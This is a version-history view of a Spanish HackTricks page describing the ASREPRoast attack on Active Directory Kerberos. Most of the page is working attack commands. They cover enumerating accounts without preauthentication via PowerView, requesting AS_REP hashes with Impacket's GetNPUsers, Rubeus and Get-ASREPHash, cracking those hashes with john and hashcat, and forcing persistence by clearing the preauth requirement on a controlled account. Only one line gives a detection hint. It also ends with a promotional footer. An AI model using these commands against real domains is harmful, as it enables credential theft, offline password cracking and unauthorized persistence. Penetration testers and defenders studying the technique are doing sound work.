hacktricks/windows-hardening/active-directory-methodology/asreproast.md

69 lines
4.3 KiB
Markdown
Raw Normal View History

2023-03-05 19:54:13 +00:00
## ASREPRoast
2023-06-03 01:46:23 +00:00
El ataque ASREPRoast busca usuarios sin el atributo de requerimiento de preautenticación de Kerberos (_**DONT_REQ_PREAUTH**_).
2023-06-03 01:46:23 +00:00
Esto significa que cualquier persona puede enviar una solicitud AS_REQ al DC en nombre de cualquiera de esos usuarios y recibir un mensaje AS_REP. Este último tipo de mensaje contiene un fragmento de datos cifrado con la clave de usuario original, derivada de su contraseña. Luego, utilizando este mensaje, la contraseña del usuario podría ser descifrada sin conexión.
2023-06-03 01:46:23 +00:00
Además, **no se necesita una cuenta de dominio para realizar este ataque**, solo la conexión al DC. Sin embargo, **con una cuenta de dominio**, se puede utilizar una consulta LDAP para **recuperar usuarios sin preautenticación de Kerberos** en el dominio. **De lo contrario, los nombres de usuario deben ser adivinados**.
2023-06-03 01:46:23 +00:00
#### Enumeración de usuarios vulnerables (se necesitan credenciales de dominio)
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
2023-06-03 01:46:23 +00:00
#### Solicitar mensaje AS_REP
2023-06-03 01:46:23 +00:00
{% code title="Usando Linux" %}
```bash
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
```
2023-06-03 01:46:23 +00:00
{% code title="Usando Windows" %}
```bash
2022-08-15 13:00:19 +00:00
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
```
{% endcode %}
2022-08-15 13:00:19 +00:00
{% hint style="warning" %}
2023-06-03 01:46:23 +00:00
El robo de AS-REP con Rubeus generará un evento 4768 con un tipo de cifrado de 0x17 y un tipo de preautenticación de 0.
2022-08-15 13:00:19 +00:00
{% endhint %}
2023-06-03 01:46:23 +00:00
### Descifrando
```
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
2023-06-03 01:46:23 +00:00
### Persistencia
2023-06-03 01:46:23 +00:00
Forzar que no se requiera **preauth** para un usuario en el que se tienen permisos de **GenericAll** (o permisos para escribir propiedades):
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
2023-06-03 01:46:23 +00:00
## Referencias
2023-06-03 01:46:23 +00:00
[**Más información sobre el robo de AS-RRP en ired.team**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
2022-04-28 16:01:33 +00:00
<figure><img src="../../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>
2023-03-05 19:54:13 +00:00
2023-06-03 01:46:23 +00:00
[**Sigue a HackenProof**](https://bit.ly/3xrrDrL) **para aprender más sobre errores web3**
2023-02-27 09:28:45 +00:00
2023-06-03 01:46:23 +00:00
🐞 Lee tutoriales sobre errores web3
2023-02-27 09:28:45 +00:00
2023-06-03 01:46:23 +00:00
🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores
2023-02-27 09:28:45 +00:00
2023-06-03 01:46:23 +00:00
💬 Participa en discusiones de la comunidad
2022-11-05 09:07:43 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-06-03 01:46:23 +00:00
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>